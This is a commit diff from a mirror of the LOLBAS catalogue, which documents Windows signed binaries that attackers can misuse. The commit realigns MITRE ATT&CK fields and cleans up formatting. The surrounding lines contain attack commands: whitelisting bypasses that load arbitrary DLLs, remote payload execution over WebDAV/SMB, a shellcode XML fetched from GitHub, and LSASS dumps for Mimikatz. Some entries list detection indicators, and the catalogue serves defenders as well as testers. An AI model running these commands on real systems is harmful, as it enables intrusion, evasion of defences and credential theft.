mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-07-26 12:12:31 +02:00
MITRE ATT&CK realignment sprint
This commit is contained in:
Wietze
GitHub
@@ -10,15 +10,14 @@ Commands:
|
||||
Category: Dump
|
||||
Privileges: SYSTEM
|
||||
MitreID: T1003
|
||||
MitreLink: https://attack.mitre.org/techniques/T1003/
|
||||
OperatingSystem: All Windows
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe
|
||||
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\adplus.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
Resources:
|
||||
- Link: https://blog.thecybersecuritytutor.com/adplus-debugging-tool-lsass-dump/
|
||||
Acknowledgement:
|
||||
|
||||
@@ -10,7 +10,6 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows 10
|
||||
- Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\temp\" 0 1
|
||||
Description: If we place a binary named powershell.exe in the path c:\temp, agentexecutor.exe will execute it successfully
|
||||
@@ -18,7 +17,6 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows 10
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Microsoft Intune Management Extension
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
---
|
||||
Name: Appvlp.exe
|
||||
Description: Application Virtualization Utility Included with Microsoft Office 2016
|
||||
Author: ''
|
||||
Author: 'Oddvar Moe'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: AppVLP.exe \\webdav\calc.bat
|
||||
@@ -10,7 +10,6 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows 10 w/Office 2016
|
||||
- Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)"
|
||||
Usecase: Local execution of process bypassing Attack Surface Reduction (ASR).
|
||||
@@ -18,7 +17,6 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows 10 w/Office 2016
|
||||
- Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"
|
||||
Usecase: Local execution of process bypassing Attack Surface Reduction (ASR).
|
||||
@@ -26,7 +24,6 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows 10 w/Office 2016
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe
|
||||
|
||||
@@ -10,7 +10,6 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
- Command: bginfo.exe bginfo.bgi /popup /nolicprompt
|
||||
Description: Execute VBscript code that is referenced within the bginfo.bgi file.
|
||||
@@ -18,7 +17,6 @@ Commands:
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
- Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
|
||||
Usecase: Remote execution of VBScript
|
||||
@@ -26,7 +24,6 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
- Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
|
||||
Usecase: Remote execution of VBScript
|
||||
@@ -34,7 +31,6 @@ Commands:
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
- Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
|
||||
Usecase: Remote execution of VBScript
|
||||
@@ -42,7 +38,6 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
- Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
|
||||
Usecase: Remote execution of VBScript
|
||||
@@ -50,7 +45,6 @@ Commands:
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
Full_Path:
|
||||
- Path: No fixed path
|
||||
|
||||
@@ -10,7 +10,6 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
- Command: |
|
||||
cdb.exe -pd -pn <process_name>
|
||||
@@ -19,8 +18,7 @@ Commands:
|
||||
Usecase: Run a shell command under a trusted Microsoft signed binary
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID:
|
||||
MitreLink:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe
|
||||
@@ -34,11 +32,11 @@ Resources:
|
||||
- Link: https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options
|
||||
- Link: https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda
|
||||
- Link: https://blog.thecybersecuritytutor.com/the-power-of-cdb-debugging-tool/
|
||||
Acknoledgement:
|
||||
Acknowledgement:
|
||||
- Person: Matt Graeber
|
||||
Handle: '@mattifestation'
|
||||
- Person: mr.d0x
|
||||
Handle: '@mrd0x'
|
||||
- Person: Spooky Sec
|
||||
Handle: '@sec_spooky'
|
||||
---
|
||||
---
|
||||
|
||||
@@ -10,7 +10,6 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1055
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1055
|
||||
OperatingSystem: Windows
|
||||
- Command: coregen.exe dummy_assembly_name
|
||||
Description: Loads the coreclr.dll in the corgen.exe directory (e.g. C:\Program Files\Microsoft Silverlight\5.1.50918.0).
|
||||
@@ -18,7 +17,6 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1055
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1055
|
||||
OperatingSystem: Windows
|
||||
- Command: coregen.exe /L C:\folder\evil.dll dummy_assembly_name
|
||||
Description: Loads the target .DLL in arbitrary path specified with /L. Since binary is signed it can also be used to bypass application whitelisting solutions.
|
||||
@@ -26,13 +24,12 @@ Commands:
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\Microsoft Silverlight\5.1.50918.0\coregen.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: coregen.exe loading .dll file not in "C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\"
|
||||
- IOC: coregen.exe loading .dll file not named coreclr.dll
|
||||
@@ -44,9 +41,9 @@ Resources:
|
||||
- Link: https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html
|
||||
Acknowledgement:
|
||||
- Person: Nicky Tyrer
|
||||
Handle:
|
||||
Handle:
|
||||
- Person: Evan Pena
|
||||
Handle:
|
||||
Handle:
|
||||
- Person: Casey Erikson
|
||||
Handle:
|
||||
Handle:
|
||||
---
|
||||
|
||||
@@ -10,7 +10,6 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
Full_Path:
|
||||
- Path: c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe
|
||||
|
||||
@@ -10,7 +10,6 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||
OperatingSystem: Windows
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Microsoft\DefaultPack\
|
||||
|
||||
@@ -10,7 +10,6 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||
OperatingSystem: Windows 7 and up with VS/VScode installed
|
||||
- Command: devtoolslauncher.exe LaunchForDebug [PATH_TO_BIN] "argument here" test
|
||||
Description: The above binary will execute other binary.
|
||||
@@ -18,7 +17,6 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||
OperatingSystem: Windows 7 and up with VS/VScode installed
|
||||
Full_Path:
|
||||
- Path: 'c:\windows\system32\devtoolslauncher.exe'
|
||||
|
||||
@@ -10,7 +10,6 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
Full_Path:
|
||||
- Path: N/A
|
||||
|
||||
@@ -9,7 +9,6 @@ Commands:
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows 7 and up with .NET installed
|
||||
- Command: dotnet.exe [PATH_TO_DLL]
|
||||
Description: dotnet.exe will execute any DLL.
|
||||
@@ -17,14 +16,12 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows 7 and up with .NET installed
|
||||
- Command: dotnet.exe msbuild [Path_TO_XML_CSPROJ]
|
||||
Description: dotnet.exe with msbuild (SDK Version) will execute unsigned code
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows 10 with .NET Core installed
|
||||
Full_Path:
|
||||
- Path: 'C:\Program Files\dotnet\dotnet.exe'
|
||||
|
||||
@@ -10,7 +10,6 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\dxcap.exe
|
||||
|
||||
@@ -10,7 +10,6 @@ Commands:
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Excel.exe
|
||||
|
||||
@@ -10,29 +10,27 @@ Commands:
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1059
|
||||
MitreLink: https://attack.mitre.org/techniques/T1059/
|
||||
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
|
||||
- Command: fsi.exe
|
||||
Description: Execute F# code via interactive command line
|
||||
Description: Execute F# code via interactive command line
|
||||
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1059
|
||||
MitreLink: https://attack.mitre.org/techniques/T1059/
|
||||
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\dotnet\sdk\[sdk version]\FSharp\fsi.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1
|
||||
Detection:
|
||||
Detection:
|
||||
- IOC: Sysmon Event ID 1 - Process Creation
|
||||
Resources:
|
||||
- Link: https://twitter.com/NickTyrer/status/904273264385589248
|
||||
- Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
|
||||
Acknowledgement:
|
||||
- Person: Nick Tyrer
|
||||
- Person: Nick Tyrer
|
||||
Handle: '@NickTyrer'
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
||||
---
|
||||
|
||||
@@ -10,27 +10,25 @@ Commands:
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1059
|
||||
MitreLink: https://attack.mitre.org/techniques/T1059/
|
||||
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
|
||||
- Command: fsianycpu.exe
|
||||
Description: Execute F# code via interactive command line
|
||||
Description: Execute F# code via interactive command line
|
||||
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1059
|
||||
MitreLink: https://attack.mitre.org/techniques/T1059/
|
||||
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
|
||||
Full_Path:
|
||||
- Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1
|
||||
Detection:
|
||||
Detection:
|
||||
- IOC: Sysmon Event ID 1 - Process Creation
|
||||
Resources:
|
||||
- Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
|
||||
Acknowledgement:
|
||||
- Person: Nick Tyrer
|
||||
- Person: Nick Tyrer
|
||||
Handle: '@NickTyrer'
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
||||
---
|
||||
|
||||
@@ -10,7 +10,6 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
- Command: Mftrace.exe powershell.exe
|
||||
Description: Launch cmd.exe as a subprocess of Mftrace.exe.
|
||||
@@ -18,7 +17,6 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86
|
||||
|
||||
@@ -10,7 +10,6 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows server
|
||||
- Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat"
|
||||
Description: Launch calc.bat via msdeploy.exe.
|
||||
@@ -18,7 +17,6 @@ Commands:
|
||||
Category: AWL bypass
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows server
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\IIS\Microsoft Web Deploy V3\msdeploy.exe
|
||||
|
||||
@@ -10,7 +10,6 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
- Command: msxsl.exe customers.xml script.xsl
|
||||
Description: Run COM Scriptlet code within the script.xsl file (local).
|
||||
@@ -18,7 +17,6 @@ Commands:
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
- Command: msxls.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
|
||||
Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
|
||||
@@ -26,7 +24,6 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
- Command: msxls.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
|
||||
Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
|
||||
@@ -34,7 +31,6 @@ Commands:
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
Full_Path:
|
||||
- Path:
|
||||
|
||||
@@ -10,7 +10,6 @@ Commands:
|
||||
Category: Dump
|
||||
Privileges: Administrator
|
||||
MitreID: T1003
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1003
|
||||
OperatingSystem: Windows
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\ntdsutil.exe
|
||||
|
||||
@@ -10,7 +10,6 @@ Commands:
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Powerpnt.exe
|
||||
|
||||
@@ -10,7 +10,6 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1202
|
||||
MitreLink: https://attack.mitre.org/techniques/T1202
|
||||
OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher.
|
||||
- Command: procdump.exe -md calc.dll foobar
|
||||
Description: Loads calc.dll where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary.
|
||||
@@ -18,12 +17,14 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1202
|
||||
MitreLink: https://attack.mitre.org/techniques/T1202
|
||||
OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher.
|
||||
Detection:
|
||||
Detection:
|
||||
- IOC: Process creation with given '-md' parameter
|
||||
- IOC: Anomalous child processes of procdump
|
||||
- IOC: Unsigned DLL load via procdump.exe or procdump64.exe
|
||||
Resources:
|
||||
- Link: https://twitter.com/ajpc500/status/1448588362382778372?s=20
|
||||
Acknowledgement:
|
||||
- Name: Alfie Champion
|
||||
Handle: '@ajpc500'
|
||||
---
|
||||
|
||||
@@ -10,7 +10,6 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
- Command: rcsi.exe bypass.csx
|
||||
Description: Use embedded C# within the csx script to execute the code.
|
||||
@@ -18,7 +17,6 @@ Commands:
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
Full_Path:
|
||||
- Path:
|
||||
|
||||
@@ -2,38 +2,35 @@
|
||||
Name: Remote.exe
|
||||
Description: Debugging tool included with Windows Debugging Tools
|
||||
Author: mr.d0x
|
||||
Created: 1/6/2021
|
||||
Created: 2021-06-01
|
||||
Commands:
|
||||
- Command: Remote.exe /s "powershell.exe" anythinghere
|
||||
Description: Spawns powershell as a child process of remote.exe
|
||||
Usecase: Executes a process under a trusted Microsoft signed binary
|
||||
Usecase: Executes a process under a trusted Microsoft signed binary
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID:
|
||||
MitreLink:
|
||||
MitreID: T1218
|
||||
OperatingSystem:
|
||||
- Command: Remote.exe /s "powershell.exe" anythinghere
|
||||
Description: Spawns powershell as a child process of remote.exe
|
||||
Usecase: Executes a process under a trusted Microsoft signed binary
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID:
|
||||
MitreLink:
|
||||
MitreID: T1218
|
||||
OperatingSystem:
|
||||
- Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere
|
||||
Description: Run a remote file
|
||||
Usecase: Executing a remote binary without saving file to disk
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID:
|
||||
MitreLink:
|
||||
MitreID: T1218
|
||||
OperatingSystem:
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe
|
||||
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: remote.exe spawned
|
||||
Resources:
|
||||
- Link: https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/
|
||||
|
||||
@@ -10,7 +10,6 @@ Commands:
|
||||
Category: Dump
|
||||
Privileges: Administrator
|
||||
MitreID: T1003
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1003
|
||||
OperatingSystem: Windows
|
||||
- Command: sqldumper.exe 540 0 0x01100:40
|
||||
Description: 0x01100:40 flag will create a Mimikatz compatible dump file.
|
||||
@@ -18,7 +17,6 @@ Commands:
|
||||
Category: Dump
|
||||
Privileges: Administrator
|
||||
MitreID: T1003
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1003
|
||||
OperatingSystem: Windows
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
|
||||
|
||||
@@ -10,7 +10,6 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
Full_Path:
|
||||
- Path: C:\Program files (x86)\Microsoft SQL Server\100\Tools\Binn\sqlps.exe
|
||||
|
||||
@@ -10,7 +10,6 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
Full_Path:
|
||||
- Path: C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe
|
||||
|
||||
@@ -10,7 +10,6 @@ Commands:
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||
- Command: squirrel.exe --update [url to package]
|
||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
||||
@@ -18,7 +17,6 @@ Commands:
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||
- Command: squirrel.exe --update [url to package]
|
||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
||||
@@ -26,7 +24,6 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||
- Command: squirrel.exe --updateRoolback=[url to package]
|
||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
||||
@@ -34,7 +31,6 @@ Commands:
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||
- Command: squirrel.exe --updateRollback=[url to package]
|
||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
||||
@@ -42,7 +38,6 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||
Full_Path:
|
||||
- Path: '%localappdata%\Microsoft\Teams\current\Squirrel.exe'
|
||||
|
||||
@@ -10,7 +10,6 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
Full_Path:
|
||||
- Path:
|
||||
|
||||
@@ -10,7 +10,6 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
- Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe
|
||||
Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions.
|
||||
@@ -18,7 +17,6 @@ Commands:
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
Full_Path:
|
||||
- Path:
|
||||
|
||||
@@ -10,7 +10,6 @@ Commands:
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||
- Command: Update.exe --update=[url to package]
|
||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
||||
@@ -18,7 +17,6 @@ Commands:
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||
- Command: Update.exe --update=[url to package]
|
||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
||||
@@ -26,7 +24,6 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||
- Command: Update.exe --update=\\remoteserver\payloadFolder
|
||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
|
||||
@@ -34,7 +31,6 @@ Commands:
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||
- Command: Update.exe --update=\\remoteserver\payloadFolder
|
||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
|
||||
@@ -42,7 +38,6 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||
- Command: Update.exe --updateRollback=[url to package]
|
||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
||||
@@ -50,7 +45,6 @@ Commands:
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||
- Command: Update.exe --updateRollback=[url to package]
|
||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
||||
@@ -58,7 +52,6 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||
